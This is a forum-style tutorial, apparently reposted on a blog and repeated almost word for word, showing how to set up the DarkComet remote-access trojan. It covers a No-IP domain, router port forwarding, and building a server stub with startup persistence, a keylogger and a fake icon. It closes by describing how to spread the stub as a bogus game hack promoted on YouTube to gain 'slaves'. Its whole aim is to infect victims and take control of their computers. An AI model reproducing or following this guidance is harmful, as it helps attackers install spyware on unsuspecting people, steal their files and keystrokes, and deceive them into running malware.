Greetings!
I am cyBen. This will be my first tutorial on this site. :)
What is DarkComet?
DarkComet is an extremely powerful RAT tool. You create servers with a few button clicks, spread them around and whoever runs them will get infected. Infected? That means, you will have 100% access to their computer files. You can control their computer from yours, which is extremely usefull.
::Table of contents::
1. Downloading the required software.
2. Setting everything up, making your computer accepting connections.
3. Creating our first server.
4. Spreading our servers.
1.
The software we are going to download is Winrar, No-IP DUC client & DarkComet itself.
Winrar download: http://adf.ly/Rrvbd
No-IP DUC Client: http://adf.ly/RrvXo
DarkComet: http://adf.ly/Rrvjd
*No files are password protected*
I am giving you my DarkComet since the site where the original download is is down.
After you have downloaded the files, hold on to the DarkComet .rar package until you've installed Winrar & the No-IP DUC Client.
When you've installed the programs, rightclick on the DarkComet package and click 'Extract Here'.
Now you should have a folder called 'DarkComet 5.3'. Open it, and open 'DarkComet.exe' inside.
Congratulations! You've now ran the main program we will use to infect people! (It should look like this btw)
![[Image: KMhT]](http://puu.sh/KMhT)
2.
Now we are going to set everything up so people will be able to connect to your computer. We are going to have to portforward & get a no-ip domain.
Head over to http://adf.ly/Rrvgd and create an account. When you're done & logged in, it should look like this:
![[Image: KMj4]](http://puu.sh/KMj4)
*Protip: Use all fake details when signing up, only use a valid mail which you can use to activate the account.
Click on the 'Manage hosts' button.
Click on the 'Add a host' button.
Now it should look like this:
![[Image: KMl2]](http://puu.sh/KMl2)
The ONLY part you are going to edit, is the 'Hostname' field. NOTHING else.
Make up a random name, like: "rfe900", but make sure to remember it. Then choose a domain. When you're done (You can have absolutely ANYTHING), press the 'Create host' button.
There! We now have a no-ip domain!
Now we are going to open the DUC client.
Sign in with your no-ip account. Don't use your no-ip username, or hostname, use the mail account you used when you signed up.
Done? Press the 'Select hosts' button.
There you have your domain! Tick the tickbox and press 'Ok'. If we get three green checkmarks, we are ready to move on to portforwarding.
Open cmd.exe. Type in the command 'ipconfig' without the quotes.
![[Image: KMro]](http://puu.sh/KMro)
You see the IPv4 field? It says 192.168.0.102. That's the IP we are going to open ports for.
You see the default IP field? That is your routers IP which we will use to sign in.
Go to http://192.168.0.1 (or could be different if you have a different router)
Others:
http://192.168.1.1
http://192.168.0.0
http://192.168.1.0
Sign in. The username and password is stated underneath your router. It is usually 'Admin' & 'Admin' or 'Admin' & 'Password' or 'Admin' & '1234'. Again, could be different though.
Now, find your portforward options.
![[Image: KMuQ]](http://puu.sh/KMuQ)
Private IP: Your IPv4 IP address, mine was 192.168.0.102, like I stated above.
Computer name: Not important or needed.
Type: Both or TCP & UDP
Port range: The port you want to use. I have 6112, then I have it like this:
![[Image: KMvF]](http://puu.sh/KMvF)
Well done! Now press 'Add' !
You might notice your internet connection dying. It is because the router is doing a soft reset, and your internet connection should work within 20 seconds.
No IP = DONE
Portforwarding = DONE
3.
Now we are going to head back to our DarkComet window & create our first server. (Press DarkComet-RAT>Server module>Full editor)
![[Image: KMyh]](http://puu.sh/KMyh)
Here we are going to edit a few things. Press the 'Random' button a few times next to the mutex option. Edit the 'Guest-1' into something else, preferably the same name as the application you will use to spread. For example, if you're going to create a 'Runescape DDoSer', you might as well name the Server ID 'Runescape DDoSer'. This way, you'll know how your target got infected.
Now, head over to 'Network settings'.
![[Image: KMAm]](http://puu.sh/KMAm)
In the IP/DNS field, type your no-ip hostname & domain. For the port, type the port you portforwarded.
Then press 'Add'.
![[Image: KMBC]](http://puu.sh/KMBC)
Here is a neat feature.
![[Image: KMBP]](http://puu.sh/KMBP)
Do you want the server to start up every time the target starts his computer? Yes you do, otherwise, you will lose him as a slave as soon as he turns his computer off. Turn this 'ON' and make up some information.
Next thing we are going to examine, is the 'Keylogger' function. This is the most usefull one in my opinion. Just make sure the 'Active offline keylogger' tickbox is TICKED.
![[Image: KMCV]](http://puu.sh/KMCV)
Icons.
Choosing an icon is pretty important. If you send a program which has no icon, it immediately becomes suspicious. If you are going to make a fake 'Facebook hack', then just choose the Facebook icon. :)
Stub finalization.
Here we are going to finally create our stub, which is also known as the server. Press the 'Build The Stub' button in the lower right corner when you're ready. You will be prompted to save this file somewhere. I would save it to the desktop so I can find it easily.
Well done! You've created your first server!
BUT! We are not done yet. Head over to the DarkComet main window:
![[Image: KMIm]](http://puu.sh/KMIm)
Press the 'Socket/Net' tab
![[Image: KMID]](http://puu.sh/KMID)
Rightclick anywhere & select 'Add port to listen'
![[Image: KMJB]](http://puu.sh/KMJB)
Type in the port you portforwarded & untick the 'Automatically portforward' and press 'Listen' button.
![[Image: KMJZ]](http://puu.sh/KMJZ)
NOW, we are ready to start spreading!
4.
I might make a spreading tutorial, but there are already plenty out there. What I usually do is, create a fake but legit looking program in visual basic, with timers and progressbars so it looks like it is actually doing anything. Then make a video & prepare to upload it to youtube. Then I edit the video so it teleports my runescape character or whatever I want the fake program to do. Do the same, and put the download link to your fake program in your video description. Doing this will get you at least one slave.
That concludes my tutorial. I hope I learned you guys something and I did not leech this off anywhere.
Happy spreading of viruses!
All the download links once again:
Winrar download: http://adf.ly/Rrvbd
No-IP DUC Client: http://adf.ly/RrvXo
DarkComet: Removed - Infected - Tip to all: Use search function, we've enough such threads and you'll find clean links.
I am cyBen. This will be my first tutorial on this site. :)
What is DarkComet?
DarkComet is an extremely powerful RAT tool. You create servers with a few button clicks, spread them around and whoever runs them will get infected. Infected? That means, you will have 100% access to their computer files. You can control their computer from yours, which is extremely usefull.
::Table of contents::
1. Downloading the required software.
2. Setting everything up, making your computer accepting connections.
3. Creating our first server.
4. Spreading our servers.
1.
The software we are going to download is Winrar, No-IP DUC client & DarkComet itself.
Winrar download: http://adf.ly/Rrvbd
No-IP DUC Client: http://adf.ly/RrvXo
DarkComet: http://adf.ly/Rrvjd
*No files are password protected*
I am giving you my DarkComet since the site where the original download is is down.

After you have downloaded the files, hold on to the DarkComet .rar package until you've installed Winrar & the No-IP DUC Client.
When you've installed the programs, rightclick on the DarkComet package and click 'Extract Here'.
Now you should have a folder called 'DarkComet 5.3'. Open it, and open 'DarkComet.exe' inside.
Congratulations! You've now ran the main program we will use to infect people! (It should look like this btw)
2.
Now we are going to set everything up so people will be able to connect to your computer. We are going to have to portforward & get a no-ip domain.
Head over to http://adf.ly/Rrvgd and create an account. When you're done & logged in, it should look like this:
*Protip: Use all fake details when signing up, only use a valid mail which you can use to activate the account.
Click on the 'Manage hosts' button.
Click on the 'Add a host' button.
Now it should look like this:
The ONLY part you are going to edit, is the 'Hostname' field. NOTHING else.
Make up a random name, like: "rfe900", but make sure to remember it. Then choose a domain. When you're done (You can have absolutely ANYTHING), press the 'Create host' button.
There! We now have a no-ip domain!
Now we are going to open the DUC client.
Sign in with your no-ip account. Don't use your no-ip username, or hostname, use the mail account you used when you signed up.
Done? Press the 'Select hosts' button.
There you have your domain! Tick the tickbox and press 'Ok'. If we get three green checkmarks, we are ready to move on to portforwarding.
Open cmd.exe. Type in the command 'ipconfig' without the quotes.
You see the IPv4 field? It says 192.168.0.102. That's the IP we are going to open ports for.
You see the default IP field? That is your routers IP which we will use to sign in.
Go to http://192.168.0.1 (or could be different if you have a different router)
Others:
http://192.168.1.1
http://192.168.0.0
http://192.168.1.0
Sign in. The username and password is stated underneath your router. It is usually 'Admin' & 'Admin' or 'Admin' & 'Password' or 'Admin' & '1234'. Again, could be different though.
Now, find your portforward options.
Private IP: Your IPv4 IP address, mine was 192.168.0.102, like I stated above.
Computer name: Not important or needed.
Type: Both or TCP & UDP
Port range: The port you want to use. I have 6112, then I have it like this:
Well done! Now press 'Add' !
You might notice your internet connection dying. It is because the router is doing a soft reset, and your internet connection should work within 20 seconds.
No IP = DONE
Portforwarding = DONE
3.
Now we are going to head back to our DarkComet window & create our first server. (Press DarkComet-RAT>Server module>Full editor)
Here we are going to edit a few things. Press the 'Random' button a few times next to the mutex option. Edit the 'Guest-1' into something else, preferably the same name as the application you will use to spread. For example, if you're going to create a 'Runescape DDoSer', you might as well name the Server ID 'Runescape DDoSer'. This way, you'll know how your target got infected.
Now, head over to 'Network settings'.
In the IP/DNS field, type your no-ip hostname & domain. For the port, type the port you portforwarded.
Then press 'Add'.
Here is a neat feature.
Do you want the server to start up every time the target starts his computer? Yes you do, otherwise, you will lose him as a slave as soon as he turns his computer off. Turn this 'ON' and make up some information.
Next thing we are going to examine, is the 'Keylogger' function. This is the most usefull one in my opinion. Just make sure the 'Active offline keylogger' tickbox is TICKED.
Icons.
Choosing an icon is pretty important. If you send a program which has no icon, it immediately becomes suspicious. If you are going to make a fake 'Facebook hack', then just choose the Facebook icon. :)
Stub finalization.
Here we are going to finally create our stub, which is also known as the server. Press the 'Build The Stub' button in the lower right corner when you're ready. You will be prompted to save this file somewhere. I would save it to the desktop so I can find it easily.
Well done! You've created your first server!
BUT! We are not done yet. Head over to the DarkComet main window:
Press the 'Socket/Net' tab
Rightclick anywhere & select 'Add port to listen'
Type in the port you portforwarded & untick the 'Automatically portforward' and press 'Listen' button.
NOW, we are ready to start spreading!
4.
I might make a spreading tutorial, but there are already plenty out there. What I usually do is, create a fake but legit looking program in visual basic, with timers and progressbars so it looks like it is actually doing anything. Then make a video & prepare to upload it to youtube. Then I edit the video so it teleports my runescape character or whatever I want the fake program to do. Do the same, and put the download link to your fake program in your video description. Doing this will get you at least one slave.
That concludes my tutorial. I hope I learned you guys something and I did not leech this off anywhere.
Happy spreading of viruses!
All the download links once again:
Winrar download: http://adf.ly/Rrvbd
No-IP DUC Client: http://adf.ly/RrvXo
DarkComet: Removed - Infected - Tip to all: Use search function, we've enough such threads and you'll find clean links.
Credits : cyBen
No comments:
Post a Comment
Note: only a member of this blog may post a comment.